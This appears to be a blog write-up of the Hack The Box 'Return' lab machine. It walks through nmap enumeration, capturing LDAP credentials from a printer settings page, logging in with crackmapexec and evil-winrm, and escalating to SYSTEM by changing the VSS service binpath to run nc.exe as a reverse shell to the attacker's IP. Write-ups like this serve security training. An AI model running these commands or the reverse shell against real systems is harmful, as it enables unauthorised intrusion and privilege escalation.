HTB - Return

Easy Machine

Enumeration

We start with our nmap scan

nmap -p- --open -sS -sCV --min-rate 5000 -n -Pn -vvv 10.10.11.108 -oN Targeted
nmap

Some ports found are:

80,135,139,389,445

Port 80, shows a web page with some inputs with port 389 in "Server Port" field, I tried changing "Server Address" input to my IP address

ip

Opening tcpdump we get some responses

tcpdump -i tun0 -n icmp
tcpdump

And just by liistening with nc on port 389, we get some output:

nc

Some creds were found

svc-printer:1edFg43012 !!

Shell as svc-printer

Testing those creds with crackmapexec turns valid

crackmapexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012 !!'

Trying to see if our user is part of group "Remote Management users" also was valid

crackmapexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012 !!'

So I just used evil-winrm to log into the machine

evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012 !!'

Shell as System

Running "whoami/all" shows SeBackUpPrivilege and SeRestorePrivilege, alongside with group membership of Server Operators

Server Operators

“A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer.” Vamos a intentar modificar un servicio como dice aquí https://cube0x0.github.io/Pocing-Beyond-DA/

As a member of this group, I can modify any server on the system.

Checking if I can create a new service was denied

However, checking if I could start and stop services went successful

stop service

I modified with binpath the execute path of the VSS service, so it pointed to a nc.exe that I had uploaded, and it would send me back a reverse shell

sc.exe config VSS binpath="C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.11 443

Now by starting the service and listening on port 443, we got NT-Authority\System

VSS start
Shell as System

That was all for today´s write up, Hope you´ve enjoyed it.

I will be uploading a new write up every weekend, so don´t forget to stay up to the blog 😄

You can use my social media to leave me your thoughts about the write ups 👍

Twitter: https://twitter.com/KrakenEU_
Linkedin: https://www.linkedin.com/in/i%C3%B1aki-tornos-572580177/
Github: https://github.com/KrakenEU/
PreviousKrakenNextHTB - Love

Last updated